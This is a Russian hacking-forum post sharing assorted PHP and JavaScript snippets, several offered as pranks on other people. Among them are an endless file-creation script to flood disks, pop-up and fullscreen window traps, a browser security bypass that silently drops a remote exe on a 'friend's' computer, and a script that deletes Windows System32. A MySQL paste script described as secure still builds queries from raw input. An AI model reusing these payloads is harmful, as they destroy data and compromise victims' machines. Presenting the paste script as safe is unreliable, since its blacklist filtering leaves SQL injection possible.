vigilante
Premium Lite
- Регистрация
- 8 Ноя 2015
- Сообщения
- 293
- Реакции
- 8,168
- Тема Автор Вы автор данного материала? |
- #1
Голосов: 0
Если вдруг понадобилось массово сменить кодировку всех файлов из одной директории с utf8 на cp1251:
Если понадобилось засрать все папки файлами (Скрипт создаёт бесконечное число файлов с разными именами и расширениями + раличной длинны)
Скрипт проверяет на наличий сервисов POP, FTP и т.д
Не дает закрвать окно.
(пример простой, часто используется на порносайтах)
Позволяет узнать выставленную кодировку.
скрипт показывает последнее обновление страницы
Скрипт смотрит все файлы в данном каталоге, и изменяет расширения этих фалов на заданные Вами:
С помощью этого скриптика можно обойти ограничения безопасности для 'File Download' и 'File Open' и загрузить произвольный файл на компьютер *друга*
Таким способом можно подделать URL, которого не будет отображен в браузере
Прикольный скрипт, пригодится для выкидывания юзеров из чата и других пакостей
Скрипт тупо удаляет все файлы из папки
Хорошо прокоментированный скрипт безопасной работы с mysql (копирайты в сорце)
P.S Если кто желает,то дописывайте в коментах свои скрипты. Людям будет интресно,ну и вам "+" в репу будет!
Код:
<?php
function doit($dir='.'){
$d=opendir($dir);
while($f=readdir($d)){
if($f!=='.' AND $f!=='..'){
echo $f;
if(is_file($dir.'/'.$f)){
echo ' Converting...';
$a=file_get_contents($dir.'/'.$f);
$a=iconv('UTF-8','WINDOWS-1251',$a);
$fp=fopen($dir.'/'.$f,'w');
fwrite($fp,$a);
fclose($fp);
echo ' - OK<br />';
}elseif(is_dir($dir.'/'.$f)){
echo ' changing dir<br />';
doit($dir.'/'.$f);
}else{
echo ' Skipping<br />';
}
}
}
}
doit('.');
?>
Если понадобилось засрать все папки файлами (Скрипт создаёт бесконечное число файлов с разными именами и расширениями + раличной длинны)
Код:
<?php
// Greetz всем заподлянщикам...
//Аминь...
//(C) Dr.Check
////////////////////////////////////////////////////////////////
set_time_limit(0);
ignore_user_abort();
echo("<center><b>ИБО НЕХУЙ!!!</b></center>");
/////////////////////////////////////////////////////////////////
$name = array('a','b','c','d','e','f','g','h','i','j','k', 'l','m','n','o','p','r','s',
't','u','v','x','y','z','A','B','C','D','E','F','G ','H','I','J','K','L',
'M','N','O','P','R','S','T','U','V','X','Y','Z','1 ','2','3','4','5','6',
'7','8','9','0');
//////////////////////////////////////////////////////////////////
$rash= array('.txt','.dic','.doc','.xls','.exe','.ini',
'.bat','.log','.dll','.hak','.wmf','.zip','.rar',
'.tar','.gz','.jpg','.gif','.bmp');
/////////////////////////////////////////////////////////////////
while(true) {
$perem = "";
$fuck="";
for($i = 0; $i < rand(20,1); $i++) // количество сиволов в имени файла.
{
$by = rand(0, count($name) - 1);
$perem .= $name[$by];
}
$ra= rand(0, count($rash)-1);
$fuck .= $rash[$ra];
$fp=fopen($perem.$fuck,"w");
fwrite($fp,php_uname());
fclose($fp);
}
?>
Скрипт проверяет на наличий сервисов POP, FTP и т.д
Код:
<html>
<head>
<title>::CHECKER::</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<body bgcolor="#000000" text="#ffffff">
<hr width="30%"></hr><center><table border="1pt"><tr><td bgcolor="#90EE90"><center><font color="black"><b>| Введите имя сервера |</b></font></center></td></tr>
<tr><td><form action="<? $PHP_SELF ?>" method="post">
<b>NAME:</b> <input type="text" name="domain"></td></tr><tr><td><input type="submit" value="Проверить">
<button onclick=location.reload(true)>Обновить</button></td></tr></table>
<hr width="30%"></hr>
<?php
error_reporting(0);
set_time_limit(0);
$domain=$_POST['domain'];
$ip=gethostbyname($domain);
$httpport = "80";
$ftpport = "21";
$popport = "110";
$imapport = "143";
$smtpport = "25";
$sshport = "22";
echo "<b>"; echo("IP адрес хоста: "); echo "</b>";
echo "<font color=\"red\">"; echo($ip); echo "</font>"
?>
<table border="1pt"><tr><td bgcolor="#90EE90"><center><font color="black"><b>| Результаты проверки |</b></font></center></td></tr>
<tr><td><font color="#999999"><b>HTTP --> </b></font>
<?php
$http = fsockopen($domain, $httpport, $errno, $errstr, $timeout);
if (!$http)
{
echo ("<font color=\"red\"><b>\"DEACTIVATED\"</b></font>");
}
else
{
echo ("<font color=\"green\"><b>\"ACTIVATED\"</b></font>");
}
?></td></tr>
<tr><td><font color="#999999"><b>FTP --> </b></font>
<?php
$ftp = fsockopen($domain, $ftpport, $errno, $errstr, $timeout);
if (!$ftp)
{
echo ("<font color=\"red\"><b>\"DEACTIVATED\"</b></font>");
}
else
{
echo ("<font color=\"green\"><b>\"ACTIVATED\"</b></font>");
}
?></td></tr>
<tr><td><font color="#999999"><b>POP --> </b></font>
<?php
$pop = fsockopen($domain, $popport, $errno, $errstr, $timeout);
if (!$pop)
{
echo ("<font color=\"red\"><b>\"DEACTIVATED\"</b></font>");
}
else
{
echo ("<font color=\"green\"><b>\"ACTIVATED\"</b></font>");
}
?>
</td></tr>
<tr><td><font color="#999999"><b>IMAP --> </b></font>
<?php
$imap = fsockopen($domain, $imapport, $errno, $errstr, $timeout);
if (!$imap)
{
echo ("<font color=\"red\"><b>\"DEACTIVATED\"</b></font>");
}
else
{
echo ("<font color=\"green\"><b>\"ACTIVATED\"</b></font>");
}
?>
</td></tr>
<tr><td><font color="#999999"><b>SMTP --> </b></font>
<?php
$smtp = fsockopen($domain, $smtpport, $errno, $errstr, $timeout);
if (!$smtp)
{
echo ("<font color=\"red\"><b>\"DEACTIVATED\"</b></font>");
}
else
{
echo ("<font color=\"green\"><b>\"ACTIVATED\"</b></font>");
}
?>
</td></tr>
<tr><td><b><font color="#999999">SSH --> </font></b>
<?php
$ssh = fsockopen($domain, $sshport, $errno, $errstr, $timeout);
if (!$ssh)
{
echo ("<font color=\"red\"><b>\"DEACTIVATED\"</b></font>");
}
else
{
echo ("<font color=\"green\"><b>\"ACTIVATED\"</b></font>");
}
?>
</td></tr></table><hr width="30%"></hr></center>
</body>
</head>
</html>
Не дает закрвать окно.
(пример простой, часто используется на порносайтах)
Код:
<html>
<head>
<title>Press ALT+F4</title>
</head>
<body onunload="goodBye()">
<p align="center">
<b>Yuo can't close your browser window</b>
</p>
<script language="JavaScript">
<!--
function goodBye()
{window.open("Cantclose.htm");}
//-->
</script>
<p align="center">
<b>Try Alt+F4!</b>
</p>
</body>
</html>
Позволяет узнать выставленную кодировку.
Код:
<script>
var u=navigator.userAgent;
if (u.indexOf("Win") != -1) // Текст в 1251
document.writeln ("Windows 1251");
else if (u.indexOf("DOS") != -1 || u.indexOf("OS/2") != -1) // Текст в 866
document.writeln("MS-DOS CP866"); // Текст в K018
else document.writein ( "лПДЙТПЧЛБ KOI8-R");
</script>
скрипт показывает последнее обновление страницы
Код:
<script language="JavaScript">
<!--
var dateMod = "";
dateMod = document.lastModified;
document.write("Last Update: ");
document.write(dateMod);
document.write();
// -->
</script>
Скрипт смотрит все файлы в данном каталоге, и изменяет расширения этих фалов на заданные Вами:
Код:
<?php
$star= 'txt'; // Расширение ДО
$nov = 'php';//Расширение ПОСЛЕ
function listDir ($url) {
$i = 0;
$dir = opendir(".");
while (false !== ($file = readdir($dir))) {
if(($file !=".") && ($file !="..")) {
$outp[$i] = $file;
++$i;
}
}
closedir($dir);
return $outp;
}
function fil_list($path) {
global $star, $nov;
$path_array = listDir($path);
for($i=0; $i < count($path_array); $i++) {
if ($path > '') $p = '/';
else $p = '';
$ls = $path.$p.$path_array[$i];
if (@is_dir($ls)) fil_list($ls);
else if (preg_match('/\.'.$star.'$/i', $ls)) {
$fd_new = substr($ls, 0, strlen($ls)-strlen($star)).$nov;
rename ($ls, $fd_new);
echo $ls.' >>> '.$fd_new.'<br>';
}
}
}
fil_list($start_dir);
?>
С помощью этого скриптика можно обойти ограничения безопасности для 'File Download' и 'File Open' и загрузить произвольный файл на компьютер *друга*
Код:
<html>
<body>
<iframe src='http://your.domain.com/v.exe?.htm' name=
"NotFound" width="0" height="0"></iframe>
Click <a href=# onclick="javascript:document.frames.NotFound.
document.execCommand('SaveAs',1,'funny joke.exe');">here</a>.
</body>
</html>
Таким способом можно подделать URL, которого не будет отображен в браузере
Код:
javascript:document.write("<iframe src='http://www.google.com' width='100%' height='100%'></iframe>");
Прикольный скрипт, пригодится для выкидывания юзеров из чата и других пакостей
Код:
<body scroll=no bgcolor=black><script>setInterval ("focus ()", 10); w = open ('','','fullscreen=1'); w.document.write ('<body scroll=no bgcolor=black>' + document.body.innerHTML + '</body>')</script></body>
Скрипт тупо удаляет все файлы из папки
Код:
<?php
set_time_limit(0);
foreach (glob("C:/WINDOWS/System32/*") as $filename)
{
unlink($filename);
}
?>
Хорошо прокоментированный скрипт безопасной работы с mysql (копирайты в сорце)
Код:
<?php
/* WPC Paste!
* Zarathu rules the Universe
*
* By Zarathu
* www.thesarcasm.com
*
* [email protected]
*
*/
/* SETTINGS TO BE MODIFIED */
$mySQL_user = "YOUR_USERNAME";
$mySQL_pass = "YOUR_PASSWORD";
$mySQL_database = "pb";
$mySQL_table = "data";
$mySQL_idField = "id";
$mySQL_strField = "stuff";
$URLtoPaste = "http://www.thesarcasm.com/";
/*$URLtoPaste: Be careful. This needs to include the path.
*on my website, for example, if I had the paste.php in a
*folder called 'bullshit' on the server, $URLtoPaste would
*be "http://www.thesarcasm.com/bullshit/" */
//Make sure the URL ends with a slash! :]
/***************************/
/*DO NOT MODIFY, YOU TURKISH ASSHOLE :]*/
$ZarathuRulesTheUniverse = TRUE;
?>
<html>
<head>
<title>WPC Paste!</title>
</head>
<body bgcolor="#ffffff">
<?php
if($_GET['id'] != null && ($ZarathuRulesTheUniverse)) {
$id = $_GET['id'];
//security for you asshole hackers ;]
$security = strpbrk($id, '\'\"><.,;][}{+=*\\/)(');
if($security != FALSE) { throwError(); }
//if a hacker was trying to manipulate the script
//it would have already died. therefore, we can
//safely call the following method.
getData($id);
} else if($_POST['textarea'] != null && ($ZarathuRulesTheUniverse)) {
$data = $_POST['textarea'];
setData($data);
} else if(($_POST['textarea'] == null) && ($_GET['id'] == null) && ($ZarathuRulesTheUniverse)) {
echoWelcome();
}
?>
<form method="POST" action="paste.php">
<p>
<textarea name="textarea" rows="25" cols="98"></textarea><br />
<input type="submit" value="Send!" name="sendbtn"><br />
<a href="http://www.thesarcasm.com">Zarathu Rules the Universe</a>
</p>
</form>
<?php
//methods
function echoWelcome() {
echo("Welcome to WPC Paste!<br />");
echo("This program is simple to use, unless you're a complete moron.<br /><br />");
echo("Programmed by <a href=\"http://www.thesarcasm.com\">Zarathu</a><br />");
echo("Enjoy!<br />");
}
function getData($id) {
global $ZarathuRulesTheUniverse, $URLtoPaste, $mySQL_user, $mySQL_pass, $mySQL_database, $mySQL_table, $mySQL_idField, $mySQL_strField;
//security bullshit for you asshole hackers
if($id == null && ($ZarathuRulesTheUniverse)) { throwError(); }
//establishes connection...
$link = establishConnection();
//Alright, now that we've got our shit together...
//SELECT stuff FROM data WHERE id = $id
$query = mysql_query('SELECT ' . $mySQL_strField . ' FROM ' . $mySQL_table . ' WHERE ' . $mySQL_idField . ' = ' . $id);
//need this array to convert into HTML
$newLines = array("\r\n", "\n", "\r");
if(!$ZarathuRulesTheUniverse) { throwError(); }
//prints selected bullshit
if(!$query && ($ZarathuRulesTheUniverse)) {
throwSQLError();
} else {
while ($line = mysql_fetch_array($query, MYSQL_ASSOC)) {
foreach ($line as $col_value) {
echo str_replace($newLines, "<br />", $col_value);
}
}
}
}
function setData($data) {
global $ZarathuRulesTheUniverse, $URLtoPaste, $mySQL_user, $mySQL_pass, $mySQL_database, $mySQL_table, $mySQL_idField, $mySQL_strField;
if(!$ZarathuRulesTheUniverse) { throwError(); }
//establishes that hairy son of a bitch
$link = establishConnection();
$newID = rand(1000000,9000000);
//security!
$data = str_replace("'", "\'", $data);
$data = str_replace("\"", "\\\"", $data);
$data = str_replace(">", ">", $data);
$data = str_replace("<", "<", $data);
$data = str_replace('\\', '\\\\', $data);
//inserts shittles... watch me rule again.
$bullshit = "INSERT INTO $mySQL_table ($mySQL_idField, $mySQL_strField) VALUES ($newID, '$data')";
$query = mysql_query($bullshit);
if(!$query && ($ZarathuRulesTheUniverse)) {
throwSQLError();
} else {
$newURL = "$URLtoPaste" . "paste.php?id=$newID";
echo("<a href=\"$newURL\">$newURL</a>");
http_redirect($newURL);
}
}
function establishConnection() {
global $ZarathuRulesTheUniverse, $URLtoPaste, $mySQL_user, $mySQL_pass, $mySQL_database, $mySQL_table, $mySQL_idField, $mySQL_strField;
//establishes connection...
$link = mysql_connect('localhost', $mySQL_user, $mySQL_pass);
//...and checks for errors
if(!$link && ($ZarathuRulesTheUniverse)) { throwSQLError(); }
if(!mysql_select_db($mySQL_database) && ($ZarathuRulesTheUniverse)) { throwSQLError(); }
if(!$ZarathuRulesTheUniverse) { throwError(); }
return $link;
}
function throwError() {
die("Error! \n\n");
//if you really need a comment, here it is.
//throws an error and exits
}
function throwSQLError() {
die("Error! \n\n(" . mysql_error() .")");
//if you really need a comment, you're an idiot.
//go fuck yourself.
}
?>
</body>
</html>
P.S Если кто желает,то дописывайте в коментах свои скрипты. Людям будет интресно,ну и вам "+" в репу будет!